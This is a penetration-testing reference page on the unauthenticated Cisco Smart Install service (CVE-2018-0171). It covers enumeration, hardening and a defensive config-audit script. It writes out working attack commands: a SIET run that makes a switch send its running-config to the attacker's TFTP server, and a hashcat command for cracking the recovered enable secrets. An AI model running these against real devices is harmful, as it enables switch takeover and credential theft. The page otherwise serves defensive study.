Cisco Smart Install
aka smi, smart-install
Cisco's zero-touch switch provisioning on 4786, enabled by default and unauthenticated. An attacker can pull the running config (creds, SNMP strings) or push a new one — full device takeover (CVE-2018-0171).
Ports
| Port | Proto | Notes |
|---|---|---|
| 4786 | tcp | Cisco Smart Install |
Fingerprint
- nmap shows 4786/tcp open on a Cisco switch
- SMI director/client handshake responds
Key files
| Path | Holds | Sensitive |
|---|---|---|
| running-config (TFTP exfil) | enable/secret hashes, SNMP communities, VTY creds | sensitive |
Known CVEs
| CVE | Impact |
|---|---|
| CVE-2018-0171 | Smart Install remote code execution / config overwrite |
Exploitation primitives
- Unauthenticated: copy the running-config off the switch to your TFTP server
- Config leaks type-7/MD5 enable secrets and SNMP strings → crack/reuse
- Push a malicious config or trigger RCE (CVE-2018-0171)
Overview
Smart Install on 4786 auto-provisions Cisco switches and needs no authentication. The classic move is exfiltrating the running config, which hands you device credentials and SNMP strings.
Enumeration
Confirm SMI is open:
nmap -p4786 <TARGET>
Test with the Smart Install Exploitation Tool (in SIET, -t selects test mode and -i names the target):
python siet.py -t -i <TARGET>
Grab the running config
Start a local TFTP server, then have the switch copy its config to you:
python siet.py -g -i <TARGET>
Crack the recovered type-5 enable secrets offline (hashcat mode 500 is md5crypt, i.e. Cisco type 5; type-7 strings are a reversible encoding rather than a hash, so hashcat does not apply to them):
hashcat -m 500 enable_secret.txt /usr/share/wordlists/rockyou.txt
Hardening
Disable Smart Install (no vstack in global configuration) on switches that do not need it, block TCP/4786 at the network boundary, and apply the fixed IOS release for CVE-2018-0171.
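The hardening check above can be run against an exported running-config. The following is an added example, not code from this page or from SIET: it audits two constructed IOS config excerpts for Smart Install left enabled and for the credential material the page says a leaked config exposes (type-7 passwords, type-5 secrets, default SNMP communities, telnet on VTY lines).

```python
import re

# Constructed IOS running-config excerpts (not captured from a real device):
# one left at defaults, one with the hardening the page describes applied.
EXPOSED_CONFIG = """\
hostname lab-sw1
enable password 7 094F471A1A0A
username admin password 7 0822455D0A16
snmp-server community public RO
snmp-server community S3cureStr1ng RW
line vty 0 4
 password 7 045802150C2E
 transport input telnet
"""

HARDENED_CONFIG = """\
hostname lab-sw1
no vstack
enable secret 9 $9$PLACEHOLDER.scrypt.hash
snmp-server community S3cureStr1ng RW
line vty 0 4
 transport input ssh
"""

def audit_config(text):
    """Return findings for a running-config: Smart Install state plus the
    credential material a leaked config would hand to an attacker."""
    findings = []
    lines = [ln.strip() for ln in text.splitlines()]
    # Smart Install is on by default; only an explicit 'no vstack' disables it.
    if "no vstack" not in lines:
        findings.append("vstack: Smart Install not disabled, TCP/4786 listener likely exposed")
    for ln in lines:
        # type 7 is a reversible obfuscation, not a hash: treat as cleartext
        if re.match(r"(enable password|username \S+ password|password) 7 ", ln):
            findings.append("type7: " + ln)
        # type 5 is md5crypt (the page's hashcat -m 500 target); prefer type 8/9
        elif re.match(r"enable secret 5 ", ln):
            findings.append("type5: " + ln)
        elif re.match(r"snmp-server community (public|private)\b", ln):
            findings.append("snmp-default: " + ln)
        elif ln.startswith("transport input") and "telnet" in ln:
            findings.append("telnet: " + ln)
    return findings

if __name__ == "__main__":
    for finding in audit_config(EXPOSED_CONFIG):
        print(finding)
```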